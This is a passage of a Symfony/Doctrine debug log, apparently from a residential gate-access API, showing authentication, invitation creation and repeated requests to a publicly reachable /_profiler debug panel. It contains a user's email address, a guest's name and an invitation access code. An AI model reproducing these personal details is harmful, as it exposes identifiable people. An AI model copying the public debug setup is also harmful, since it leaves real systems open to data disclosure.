  1231. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  1232. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  1233. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1234. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  1235. [2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1236. [2025-12-16 19:25:21] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
  1237. [2025-12-16 19:25:21] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  1238. [2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1239. [2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1240. [2025-12-16 19:25:21] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  1241. [2025-12-16 19:25:21] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  1242. [2025-12-16 19:25:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1243. [2025-12-16 19:25:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1244. [2025-12-16 19:25:21] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1245. [2025-12-16 19:25:21] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1246. [2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1247. [2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1248. [2025-12-16 19:25:21] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1249. [2025-12-16 19:25:21] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1250. [2025-12-16 19:25:21] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1251. [2025-12-16 19:25:21] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1252. [2025-12-16 19:25:28] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  1253. [2025-12-16 19:25:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  1254. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1255. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1256. [2025-12-16 19:25:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  1257. [2025-12-16 19:25:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  1258. [2025-12-16 19:25:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1259. [2025-12-16 19:25:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1260. [2025-12-16 19:25:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1261. [2025-12-16 19:25:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1262. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1263. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1264. [2025-12-16 19:25:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1265. [2025-12-16 19:25:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1266. [2025-12-16 19:25:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1267. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1268. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  1269. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  1270. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1271. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  1272. [2025-12-16 19:25:28] doctrine.DEBUG: "START TRANSACTION" [] []
  1273. [2025-12-16 19:25:28] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"1dba3403-6c6a-48c2-af5a-12 [...]","2":1,"3":"2025-12-16 19:25:28","4":"2025-12-16 19:25:28","5":"Beatriz","6":"Rosales","7":"523338","8":"/invitation/85156e8e6107c3 [...]","9":"1","10":null,"11":"2025-12-16 19:25:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  1274. [2025-12-16 19:25:28] doctrine.DEBUG: "COMMIT" [] []
  1275. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1276. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  1277. [2025-12-16 19:25:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1278. [2025-12-16 19:25:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  1279. [2025-12-16 19:25:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  1280. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1281. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1282. [2025-12-16 19:25:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  1283. [2025-12-16 19:25:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  1284. [2025-12-16 19:25:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1285. [2025-12-16 19:25:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1286. [2025-12-16 19:25:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1287. [2025-12-16 19:25:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1288. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1289. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1290. [2025-12-16 19:25:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1291. [2025-12-16 19:25:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1292. [2025-12-16 19:25:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1293. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1294. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  1295. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1296. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  1297. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  1298. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  1299. [2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1300. [2025-12-16 19:25:29] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1301. [2025-12-16 19:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0","method":"GET"} []
  1302. [2025-12-16 19:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1303. [2025-12-16 19:34:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c7627","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4c7627?panel=twig","method":"GET"} []
  1304. [2025-12-16 19:34:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1305. [2025-12-16 19:38:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
  1306. [2025-12-16 19:38:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  1307. [2025-12-16 19:41:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0145e4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0145e4?panel=cache","method":"GET"} []
  1308. [2025-12-16 19:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1309. [2025-12-16 19:47:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=twig","method":"GET"} []
  1310. [2025-12-16 19:47:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1311. [2025-12-16 19:53:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=time","method":"GET"} []
  1312. [2025-12-16 19:53:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1313. [2025-12-16 19:59:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=twig","method":"GET"} []
  1314. [2025-12-16 19:59:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1315. [2025-12-16 20:03:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
  1316. [2025-12-16 20:03:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1317. [2025-12-16 20:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1318. [2025-12-16 20:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1319. [2025-12-16 20:06:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=request","method":"GET"} []
  1320. [2025-12-16 20:06:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1321. [2025-12-16 20:12:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=twig","method":"GET"} []
  1322. [2025-12-16 20:12:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1323. [2025-12-16 20:16:43] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
  1324. [2025-12-16 20:16:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1325. [2025-12-16 20:16:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1326. [2025-12-16 20:16:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1327. [2025-12-16 20:16:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1328. [2025-12-16 20:16:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ba49161f79430c9dba4797669f [...]"] []
